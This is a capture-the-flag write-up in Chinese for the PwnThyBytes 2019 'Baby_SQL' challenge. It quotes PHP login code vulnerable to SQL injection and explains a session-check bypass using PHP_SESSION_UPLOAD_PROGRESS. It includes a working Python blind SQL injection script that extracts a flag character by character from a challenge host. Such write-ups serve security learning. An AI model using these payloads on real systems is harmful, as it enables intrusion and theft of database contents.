php sql注入 session,[PwnThyBytes 2019]Baby_SQL(session+sql注入)

source.zip得到源码。开始审计

在index.php中。对所有输入进行了addslashes转义。

在login.php中

!isset($_SESSION) AND die("Direct access on this script is not allowed!");

include 'db.php';

$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';

$result = $con->query($sql);

function auth($user)

{

$_SESSION['username'] = $user;

return True;

}

($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('')) OR ($con->close() AND die('Try again!'));

?>

仅仅只是判断是否存在session。

如果我们自己弄个session。那么这边的username就可控。

在学习session反序列化的时候。我们学过。PHP_SESSION_UPLOAD_PROGRESS

OK。就构造一个包含PHP_SESSION_UPLOAD_PROGRESS的POST请求。

import requests

url='http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'

files={"file":"123"}

data={"PHP_SESSION_UPLOAD_PROGRESS":"123"}

cookies={"PHPSESSID":"123"}

for b in range(1,50):

for i in range(30,130):

params={"username":'test" or (ascii(substr((select group_concat(secret) from flag_tbl),'+str(b)+',1))='+str(i)+')#',

"password":"test"}

a=requests.post(url=url,files=files,data=data,cookies=cookies,params=params).text

if 'meta' in a:

print(chr(i))

break

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值